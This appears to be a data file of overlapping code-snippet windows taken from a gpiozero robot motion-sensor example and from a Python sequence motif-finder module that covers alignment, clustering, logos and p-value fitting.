"robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion",
"import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17,",
"signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion",
"Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir",
"Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18))",
"from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5)",
"Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion = robot.stop",
"MotionSensor from signal import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir =",
"gpiozero import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4, 14),",
"from gpiozero import Robot, Motor, MotionSensor from signal import pause robot = Robot(left=Motor(4,",
"= Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion = robot.forward pir.when_no_motion =",
"import pause robot = Robot(left=Motor(4, 14), right=Motor(17, 18)) pir = MotionSensor(5) pir.when_motion ="
] |
[
"seperating headers headers, instances = [list(x) for x in zip(*seqs)] instances_seqrecord = []",
"wrapper to perform Muscle Alignment on sequences.\"\"\" def __init__(self, diags=False, maxiters=16, maxhours=None, #",
"logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p in enumerate(results): loc_start_time",
"instance in i d_ij = [] for c_i in centers[i]: for c_j in",
"in zip(*seqs)] instances_seqrecord = [] for i, j in enumerate(instances): instances_seqrecord.append( SeqRecord(Seq(j, self.alphabet),",
"for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i in",
"+ 1] width = end - start val = sum(sig[start:end]) yield val, start,",
"np.vstack(cluster) score = 0 to_be_removed = [] for i, row in enumerate(cluster.T): c",
"%.2f secs' % (time.time() - start_time)) logger.debug('Performance evaluation') start_time = time.time() preds =",
"plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len = len(sig) for i",
"motives[i]['seqs'] + motives[j]['seqs'] is_high_quality, motif = self.compute_motif( seqs=seqs, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size)",
"is a motif finder algorithm. @author: <NAME> @email: <EMAIL> \"\"\" import logging import",
"wbl.LogoData().from_seqs(motif_corebio) format = wbl.LogoFormat(data, self.options) if self.output_format == 'png': return wbl.png_formatter(data, format) elif",
"format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator, ClassifierMixin): \"\"\"SequenceMotifDecomposer.\"\"\" def __init__(self, complexity=5, n_clusters=10, min_subarray_size=4, max_subarray_size=10,",
"items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time = time.time() if n_jobs ==",
"self.clusterer_is_fit: preds = self.class_estimator.predict(data_matrix) else: preds = self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True",
"time from sklearn.base import BaseEstimator, ClassifierMixin from sklearn.linear_model import SGDClassifier from sklearn.cluster import",
"= first_position if logo_range: options.logo_start = logo_range[0] options.logo_end = logo_range[1] options.scale_width = scale_stack_widths",
"save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self, model_name, compress=1) def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self,",
"motives], reverse=True): info = '#### Motif id: %d' % cluster_id txt.append(info) logo_image, logo_txts",
"estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters",
"show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends options.color_scheme",
"orig_header header += '<loc>%d:%d<loc>' % (begin, end) header += '<score>%.4f<score>' % (score) header",
"= multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0])",
"regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs = random.sample(seqs,",
"subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d (%.2f",
"str(end) + '<loc>' subsequences.append((new_header, subseq)) if not subsequences: raise Exception('No subarray was selected.",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() if k[0][0]",
"if self.maxhours is not None: params['maxhours'] = self.maxhours muscle_cline = MuscleCommandline(**params) stdout, stderr",
"resolution=96, fineprint='', ): \"\"\"Initialize an instance.\"\"\" options = wbl.LogoOptions() options.stacks_per_line = stacks_per_line options.sequence_type",
"d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq = \"\" for",
"yield i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in",
"exc_info=True) def performance(self, pos_seqs=None, neg_seqs=None): \"\"\"performance.\"\"\" try: y_pred, y_binary, y_test = multiprocess_performance( pos_seqs,",
"distances[(i, j)].append(selected) cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i,",
"_motives[cluster_id] = motives[cluster_id] if len(_motives) == 0: logger.warning('Quality filter is too strict. Ignoring",
"self.b)) def compute_p_value(self, value): \"\"\"p_value.\"\"\" y = sigmoid(value, self.a, self.b) p_val = 1",
"header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys = ecdf(scores)",
"% (fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None",
"%.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred, seq in zip(preds, subsequences):",
"sequence: %s' % motif['consensus_seq'] logo_txt.append(info) info = ' - consensus regex: %s' %",
"info = ' - average location: %.1f +- %.1f' % (av, st) txt.append(info)",
"= class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name): \"\"\"save.\"\"\" joblib.dump(self,",
"pos_block_size self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator",
">= freq_th: if std_th is None or std <= std_th: _motives[cluster_id] = motives[cluster_id]",
"regex: %.2f' % (fr) txt.append(info) av = motives[cluster_id]['avg_pos'] st = motives[cluster_id]['std_pos'] info =",
"for rel_nw_score, i, j in ms: if motives.get(i, None) and motives.get(j, None): n_i",
"None plt.show() plt.close() return figname def extract_location(needle, haystack): \"\"\"extract_location.\"\"\" locs = [] for",
"if float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = [] for",
"similarity_th=0.5, min_score=4, min_freq=0.5, min_cluster_size=10, regex_th=.3, sample_size=200, freq_th=None, std_th=None): \"\"\"select_motives.\"\"\" orig_clusters = self.compute_clusters(seqs, p_value=p_value)",
"plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname: plt.draw()",
"np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i def box_decomposition(sig,",
"pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering')",
"centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij) for c_i",
"c_i in centers[i]: for c_j in centers[j]: d_ij.append(abs(c_i - c_j)) selected_abs = min(d_ij)",
"% (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def _fasta_to_fasta(lines): seq",
"self.compute_p_value(score) if p <= p_value: yield orig_header, begin, end, p, subseq except Exception",
"'seqs': seqs} return True, motif else: return False, None def compute_motives(self, clusters, min_score=4,",
"for cluster_id in motives: regex_seq = motives[cluster_id]['regex_seq'] counts, freq = occurrences(regex_seq, seqs) motives[cluster_id]['freq']",
"motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers, data = self._seq_to_stdin_fasta(seqs) stdout =",
"self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done in",
"= set(cluster_ids) for i in cluster_ids: for j in cluster_ids: cooccurence_mtx[i, j] +=",
"txt.append(self._wrap_image(figname, output_type=output_type)) for freq, cluster_id in sorted([(motives[i]['freq'], i) for i in motives], reverse=True):",
"pool = mp.Pool() else: pool = mp.Pool(n_jobs) results = [apply_async( pool, serial_score, args=(seqs,",
"regex_j, len(ds)) txt.append(info) if len(ds): figname = plot_distance( cluster_id, j, regex_i, regex_j, distances,",
"std if freq_th is None or freq >= freq_th: if std_th is None",
"(1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a parametrized sigmoid",
"2), fname=None): \"\"\"plot_cumulative_score.\"\"\" sig = cumulative_score(seqs, smod) plt.figure(figsize=size) sigp = np.copy(sig) sigp[sigp <",
"class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size",
"(delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return scores_items # ------------------------------------------------------------------------------ def",
"extract_location(regex_seq, seqs) motives[cluster_id]['avg_pos'] = avg motives[cluster_id]['std_pos'] = std if freq_th is None or",
"regex_th): \"\"\"consensus_regex.\"\"\" cluster = [] for h, align_seq in trimmed_align_seqs: str_list = [c",
"float(len(xs)) return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys =",
"= self.compute_motives( orig_clusters, min_score=min_score, min_freq=min_freq, min_cluster_size=min_cluster_size, regex_th=regex_th, sample_size=sample_size) motives = self.merge( motives, similarity_th=similarity_th,",
"stacks_per_line=40, sequence_type='dna', # ['protein','dna','rna'] ignore_lower_case=False, # ['bits','nats','digits','kT','kJ/mol','kcal/mol','probability'] units='bits', first_position=1, logo_range=list(), # composition =",
"motif else: return False, None def compute_motives(self, clusters, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200):",
"compute. Try more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png'",
"block_size=self.pos_block_size, n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin,",
"[] true_targets = [] for i, (p, n) in enumerate(izip(pos_results, neg_results)): loc_start_time =",
"= Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator = estimator self.class_estimator = class_estimator self.clusterer = clusterer",
"seq = '' for i, row in enumerate(cluster.T): c = Counter(row) k =",
"\"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator = multiprocess_fit( pos_seqs, neg_seqs,",
"nbins, normed=0, facecolor='green', alpha=0.3) plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position')",
"return xs, ys def fit(self, scores): \"\"\"fit.\"\"\" if scores: xs, ys = self.ecdf(scores)",
"(fname, cluster_id_i, cluster_id_j) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname = None plt.show()",
"% e) logger.debug('Exception', exc_info=True) def decomposition_scores(self, seqs=None): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs,",
"p in enumerate(results): loc_start_time = time.time() scores = p.get() scores_items += scores d_time",
"clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters = n_clusters self.min_subarray_size =",
"\"\"\"Empirical cumulative distribution function.\"\"\" xs = np.sort(x) ys = np.arange(1, len(xs) + 1)",
"for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Performance",
"decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs, vectorizer=self.vectorizer, estimator=self.estimator, min_subarray_size=self.min_subarray_size, max_subarray_size=self.max_subarray_size,",
"fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score for header,",
"if scores: xs, ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a,",
"self.decompose(seqs, p_value=p_value) for header, begin, end, p, subseq in iterable: new_header = header",
"def load(self, obj): \"\"\"load.\"\"\" self.__dict__.update(joblib.load(obj).__dict__) def fit(self, pos_seqs=None, neg_seqs=None): \"\"\"fit.\"\"\" try: self.estimator =",
"- start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list) for pred,",
"n_jobs == -1: pool = mp.Pool() else: pool = mp.Pool(n_jobs) pos_results = [apply_async(",
"self.options = options self.output_format = output_format def create_logo(self, seqs=[]): \"\"\"Create sequence logo for",
"Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def score(self,",
"row /= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx =",
"tokens[1].split(':') yield (seq_id, int(begin), int(end), i) def compute_cooccurence(motives, ids=None): \"\"\"compute_cooccurence.\"\"\" if ids is",
"sign = np.copy(sig) sign[sign >= 0] = 0 plt.bar(range(len(sign)), sign, alpha=0.3, color='r') plt.grid()",
"None plt.show() plt.close() return figname # ------------------------------------------------------------------------------ def serial_pre_process(iterable, vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix =",
"= ' - num co-occurences %d %s vs %d %s: %d' % \\",
"x_label='', show_y_axis=True, y_label='', y_axis_tic_spacing=1.0, show_ends=False, # ['auto','base','pairing','charge','chemistry','classic','monochrome'] color_scheme='classic', resolution=96, fineprint='', ): \"\"\"Initialize an",
"= subarray['begin'] end = subarray['end'] score = subarray['score'] header = orig_header header +=",
"pool.join() preds = np.hstack(preds) binary_preds = np.hstack(binary_preds) true_targets = np.hstack(true_targets) return preds, binary_preds,",
"run the predictor to learn the new class definition logger.debug('After merge, %d motives'",
"if this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna',",
"reverse=True) success = False for rel_nw_score, i, j in ms: if motives.get(i, None)",
"i def box_decomposition(sig, half_windw_size=5): \"\"\"box_decomposition.\"\"\" ids = list(mean_shift_decomposition(sig, half_windw_size)) for i in range(len(ids)",
"out[i + 1] return zip(headers, motif_seqs) def transform(self, seqs=[]): \"\"\"Carry out alignment.\"\"\" headers,",
"cluster_id, motif=motives[cluster_id]) figname = self._save_logo(logo_image, cluster_id, fname) for logo_txt in logo_txts: txt.append(logo_txt) co",
"elif len(code) == 1: code_str = code[0] else: code_str = '(' + '|'.join(code)",
"closest instance j from any instance in i d_ij = [] for c_i",
"StringIO from Bio import SeqIO from Bio.Align.Applications import MuscleCommandline from Bio.Alphabet import IUPAC",
"try: for score in multiprocess_score(seqs, vectorizer=self.vectorizer, estimator=self.estimator, block_size=self.pos_block_size, n_jobs=self.n_jobs): yield score except Exception",
"1 / (1 + np.exp(-(x - a) / b)) class PValueEvaluator(object): \"\"\"Fit a",
"float(val) / dim >= min_freq: score += 1 trimmed_align_seqs = [] for h,",
"if len(sig) >= median_len: sigs = sigs + sig[:median_len] sig = np.array(sigs) /",
"= iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100, n_jobs=-1): \"\"\"multiprocess_vectorize.\"\"\" start_time =",
"size = len(haystack) return counts, float(counts) / size def extract_consensus(seqs, motives, regex_th): \"\"\"extract_consensus.\"\"\"",
"No clusters.') mcs = min_cluster_size logger.debug('Alignment') motives = dict() for cluster_id in clusters:",
"more permissive parameters.') def _save_logo(self, logo, cluster_id, fname): imagename = '%s_logo_cl_%d.png' % (fname,",
"that # kmers dont interfere cluster_seqs = [] for cluster_id in clusters: if",
"regex_j, distances, nbins=5, size=(6, 2), fname=None): \"\"\"plot_distance.\"\"\" ds = distances[(cluster_id_i, cluster_id_j)] plt.figure(figsize=size) n,",
"0:2]: if id1 < len(cluster_seqs): orders.append(int(id1)) if id2 < len(cluster_seqs): orders.append(int(id2)) return orders",
"vectorizer=self.vectorizer, pos_block_size=pos_block_size, n_jobs=self.n_jobs) logger.debug('Clustering') logger.debug('working on %d instances' % data_matrix.shape[0]) start_time = time.time()",
"= show_y_axis if y_label: options.yaxis_label = y_label options.yaxis_tic_interval = y_axis_tic_spacing options.show_ends = show_ends",
"for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common() seq +=",
"ys = self.ecdf(scores) popt, pcov = curve_fit(sigmoid, xs, ys) self.a, self.b = popt",
"estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time = time.time() classes = np.array([1, -1]) if",
"cluster_id in motives] logos = dict() for cluster_id in ids: logo_image, logo_txt =",
"m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size) n, bins,",
"= [] for i, row in enumerate(cluster.T): c = Counter(row) k = c.most_common()",
"(time.time() - start_time)) logger.debug('Predicting') start_time = time.time() scores_items = [] for i, p",
"vectorizer=None): \"\"\"serial_pre_process.\"\"\" data_matrix = vectorizer.transform(iterable) return data_matrix def chunks(iterable, n): \"\"\"chunks.\"\"\" iterable =",
"len(sig) >= median_len: sigs = sig[:median_len] else: if len(sig) >= median_len: sigs =",
"- begin) / 2) cluster_ids = set(cluster_ids) for i in cluster_ids: for j",
"/= norm else: row = np.zeros(row.shape) row[i] = 0 cooccurence_list.append(row) norm_cooccurence_mtx = np.vstack(cooccurence_list)",
"figname, output_type=output_type)) txt.append('_' * 100) else: logger.warning( 'No motives to report. Try more",
"= maxhours if alphabet == 'protein': self.alphabet = IUPAC.protein elif alphabet == 'rna':",
"as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def performance(self, pos_seqs=None,",
"exc_info=True) def fit_decomposition(self, seqs=None): \"\"\"fit_decomposition.\"\"\" self.a, self.b = -4, 1 scores = [score",
"end, i in hits(motives, ids=ids): seqs_summary[seq_id].append((begin, end, i)) distances = defaultdict(list) size =",
"from any instance in i d_ij = [] for c_i in centers[i]: for",
"\"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True)",
"return headers, data def _perform_ma(self, data): params = {'maxiters': 7} if self.diags is",
"plt.draw() figname = '%s_importance.png' % (fname) plt.savefig( figname, bbox_inches='tight', transparent=True, pad_inches=0) else: figname",
"estimator=self.estimator, pos_block_size=self.pos_block_size, neg_block_size=self.neg_block_size, n_jobs=self.n_jobs) # confusion matrix cm = metrics.confusion_matrix(y_test, y_binary) np.set_printoptions(precision=2) logger.info('Confusion",
"[score for header, score, begin, end, subseq in self.decomposition_scores(seqs)] if scores: xs, ys",
"from collections import defaultdict from eden import apply_async import numpy as np from",
"(%.2f secs) (delta: %.2f)' % (i, d_time, d_loc_time)) pool.close() pool.join() return subarrays_items def",
"letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if",
"= [] for h, align_seq in trimmed_align_seqs: str_list = [c for c in",
"pool.join() return estimator def multiprocess_performance(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_performance.\"\"\" start_time",
"return motives def quality_filter(self, seqs=None, motives=None, freq_th=None, std_th=None): \"\"\"quality_filter.\"\"\" _motives = dict() for",
"if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives'",
"begin, end, subseq def decompose(self, seqs=None, p_value=0.05): \"\"\"decomposition_scores.\"\"\" try: subarrays_items = multiprocess_subarray( seqs,",
"motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '### Summary: %d motives' %",
"= subarray['score'] header = orig_header header += '<loc>%d:%d<loc>' % (begin, end) header +=",
"return True else: return False def compute_motif(self, seqs=None, min_score=4, min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200):",
"end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s) for h, s in",
"eden import apply_async import numpy as np from scipy.sparse import vstack from eden.util.iterated_maximum_subarray",
"logo_image, logo_txt def compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None:",
"else: txt.append('<p align=\"left\"><img src=\"' + fname + '\"></p>') return '\\n'.join(txt) def report(self, pos_seqs,",
"min_sig = np.min(sig[i - half_windw_size:i + half_windw_size]) if min_sig == sig[i]: yield i",
"= match.end() m = s + (e - s) / 2 locs.append(m) plt.figure(figsize=size)",
"= Counter(row) k = c.most_common() seq += k[0][0] return seq def _compute_score(self, align_seqs,",
"= time.time() - start_time logger.debug('...done in %.2f secs' % (dtime)) self.clusters = defaultdict(list)",
"compute_logos(self, motives, ids=None): \"\"\"compute_logos.\"\"\" if motives: if ids is None: ids = [cluster_id",
"txt = [] if motives: _, norm_cooccurence_mtx, distances = compute_cooccurence(motives) info = '###",
"sigs = sigs + sig[:median_len] sig = np.array(sigs) / float(len(seqs)) return sig def",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' %",
"y_pred))) except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True)",
"output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' + url + '\"></p>') else: txt.append('<p align=\"left\"><img",
"num occurrences of regex: %d' % (co) txt.append(info) info = ' - freq",
"# ------------------------------------------------------------------------------ class MuscleAlignWrapper(object): \"\"\"A wrapper to perform Muscle Alignment on sequences.\"\"\" def",
"== 'jpeg': return wbl.jpeg_formatter(data, format) else: return wbl.eps_formatter(data, format) # ------------------------------------------------------------------------------ class SequenceMotifDecomposer(BaseEstimator,",
"for seqs in chunks(iterable, block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time)) logger.debug('Predicting')",
"regex: %d' % (co) txt.append(info) info = ' - freq of occurrences of",
"'No motives to report. Try more permissive parameters.') txt = '\\n'.join(txt) return txt",
"secs' % (time.time() - start_time)) logger.debug('Fitting') start_time = time.time() for i, (p, n)",
"len(headers) for i in range(len(out[:-1]))[::2]: id = int(out[i].split(' ')[0].split('>')[1]) motif_seqs[id] = out[i +",
"< len(cluster_seqs): orders.append(int(id2)) return orders def _compute_consensus_seq(self, align_seqs): cluster = [] for h,",
"return xs, ys def letter_regex(k, size, regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter,",
"min_freq=0.6, min_cluster_size=10, regex_th=.3, sample_size=200): \"\"\"compute_motif.\"\"\" ma = MuscleAlignWrapper(alphabet='rna') if len(seqs) > sample_size: sample_seqs",
"wb.create_logo(seqs=motif['trimmed_align_seqs']) logo_txt = [] info = ' - num subarrays: %d' % len(motif['seqs'])",
"from scipy.optimize import curve_fit import multiprocessing logger = logging.getLogger(__name__) def sigmoid(x, a, b):",
"= '(' + '|'.join(code) + ')' return code_str def consensus_regex(trimmed_align_seqs, regex_th): \"\"\"consensus_regex.\"\"\" cluster",
"self._compute_score(align_seqs, min_freq=min_freq) if score >= min_score and len(align_seqs) > min_cluster_size: return True else:",
"= self.compute_motif( seqs=clusters[cluster_id], min_score=min_score, min_freq=min_freq, min_cluster_size=mcs, regex_th=regex_th, sample_size=sample_size) if is_high_quality: motives[cluster_id] = motif",
"regex_th=.3, sample_size=200): \"\"\"merge.\"\"\" while True: ms = sorted([m for m in self._identify_mergeable_clusters( motives,",
"this alphabet is required # it over-rides tool.alphabet alphabet='dna', # ['dna', 'rna', 'protein']",
"figname = None plt.show() plt.close() return figname def mean_shift_decomposition(sig, half_windw_size=5): \"\"\"mean_shift_decomposition.\"\"\" sig_len =",
"= np.vstack(cluster) score = 0 to_be_removed = [] for i, row in enumerate(cluster.T):",
"space that # kmers dont interfere cluster_seqs = [] for cluster_id in clusters:",
"header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end, subseq =",
"vectorize the seqs and compute their gram matrix K cluster_vecs = Vectorizer(complexity).transform(cluster_seqs) gram_matrix",
"= show_x_axis if x_label: options.xaxis_label = x_label options.show_yaxis = show_y_axis if y_label: options.yaxis_label",
"max_subarray_size=10, estimator=SGDClassifier(warm_start=True), class_estimator=SGDClassifier(), clusterer=MiniBatchKMeans(), pos_block_size=300, neg_block_size=300, n_jobs=-1): \"\"\"Construct.\"\"\" self.complexity = complexity self.n_clusters =",
"= Vectorizer(complexity).transform(cluster_seqs) gram_matrix = metrics.pairwise.pairwise_kernels( cluster_vecs, metric='linear') c = linkage(gram_matrix, method='single') orders =",
"self.quality_filter( seqs, motives, freq_th=freq_th, std_th=std_th) return motives def compute_logo(self, cluster_id=None, motif=None): \"\"\"compute_logo.\"\"\" alphabet",
"logging.getLogger(__name__) def sigmoid(x, a, b): \"\"\"sigmoid.\"\"\" return 1 / (1 + np.exp(-(x -",
"vectorizer=None, estimator=None, min_subarray_size=5, max_subarray_size=10): \"\"\"serial_subarray.\"\"\" annotated_seqs = vectorizer.annotate(iterable, estimator=estimator) subarrays_items = [] for",
"regex_th=0.3): \"\"\"letter_regex.\"\"\" code = [] for letter, count in k: if count /",
"(subseq_seq) subseq = (header, seq) subseqs.append(subseq) subarrays_items += subseqs return subarrays_items def multiprocess_subarray(iterable,",
"vectorizer)) for seqs in chunks(neg_iterable, neg_block_size)] logger.debug('Setup %.2f secs' % (time.time() - start_time))",
"len(seqs) > sample_size: sample_seqs = random.sample(seqs, sample_size) else: sample_seqs = seqs align_seqs =",
"def _compute_score(self, align_seqs, min_freq=0.8): dim = len(align_seqs) cluster = [] for h, align_seq",
"txt = [] if fill_width: if output_type == 'pdf': txt.append('<p align=\"left\"><img src=\"file://' +",
"i in range(n): it = iterable.next() items.append(it) yield items def multiprocess_vectorize(iterable, vectorizer=None, pos_block_size=100,",
"pool, serial_pre_process, args=(seqs, vectorizer)) for seqs in chunks(iterable, pos_block_size)] logger.debug('Setup %.2f secs' %",
"n_jobs=self.n_jobs) for header, seq in subarrays_items: components = self._decompose_header(header) orig_header, score, begin, end,",
"self.neg_block_size = neg_block_size self.n_jobs = n_jobs self.vectorizer = Vectorizer(complexity=complexity, auto_weights=True, nbits=15) self.estimator =",
"end, subseq = components p = self.compute_p_value(score) if p <= p_value: yield orig_header,",
"code += l return code def find_occurrences(needle, haystack): \"\"\"find_occurrences.\"\"\" for h, s in",
"cooccurence_mtx = np.nan_to_num(cooccurence_mtx) orig_cooccurence_mtx = cooccurence_mtx.copy() cooccurence_list = [] for i, row in",
"= 0 plt.bar(range(len(sigp)), sigp, alpha=0.3, color='g') sign = np.copy(sig) sign[sign >= 0] =",
"sum(sig[start:end]) yield val, start, end, width def cumulative_score(seqs, smod): \"\"\"cumulative_score.\"\"\" median_len = np.median([len(s)",
"n = multiprocessing.cpu_count() pos_block_size = len(subsequences) / n data_matrix = multiprocess_vectorize( subsequences, vectorizer=self.vectorizer,",
"motives: regex_i = motives[i]['regex_seq'] if j != cluster_id: regex_j = motives[j]['regex_seq'] ds =",
"except Exception as e: logger.debug('Failed iteration. Reason: %s' % e) logger.debug('Exception', exc_info=True) def",
"plt.grid() plt.title('%s vs %s' % (regex_i, regex_j)) plt.xlabel('Relative position') plt.ylabel('Num occurrences') if fname:",
"+= subarrays_item d_time = time.time() - start_time d_loc_time = time.time() - loc_start_time logger.debug('%d",
"motives.get(i, None) and motives.get(j, None): n_i = len(motives[i]['seqs']) n_j = len(motives[j]['seqs']) seqs =",
"[apply_async( pool, serial_subarray, args=(seqs, vectorizer, estimator, min_subarray_size, max_subarray_size)) for seqs in chunks(iterable, block_size)]",
"vstack(matrices) return data_matrix def multiprocess_fit(pos_iterable, neg_iterable, vectorizer=None, estimator=None, pos_block_size=100, neg_block_size=100, n_jobs=-1): \"\"\"multiprocess_fit.\"\"\" start_time",
"= match.end() m = s + (e - s) / 2 locs.append(m) if",
"c_j in centers[j]: if selected_abs == abs(c_i - c_j): selected = c_i -",
"motives) + 1 cooccurence_mtx = np.zeros((size, size)) for seq_id in sorted(seqs_summary): cluster_ids =",
"= self.clusterer.fit_predict(data_matrix) self.class_estimator.fit(data_matrix, preds) self.clusterer_is_fit = True dtime = time.time() - start_time logger.debug('...done",
"= occurrences(c_regex, seqs) yield freq, id, c_regex, counts, motives[id]['consensus_seq'] def plot_location(needle, haystack, cluster_id=None,",
"estimator self.class_estimator = class_estimator self.clusterer = clusterer self.clusterer_is_fit = False def save(self, model_name):",
"Ignoring filter.') return motives else: logger.debug('After quality filter, %d motives' % len(_motives)) return",
"in self._identify_mergeable_clusters( motives, similarity_th=similarity_th)], reverse=True) success = False for rel_nw_score, i, j in",
"i, n_i + n_j) logger.debug(info1 + info2) # update motives motives[i] = motif",
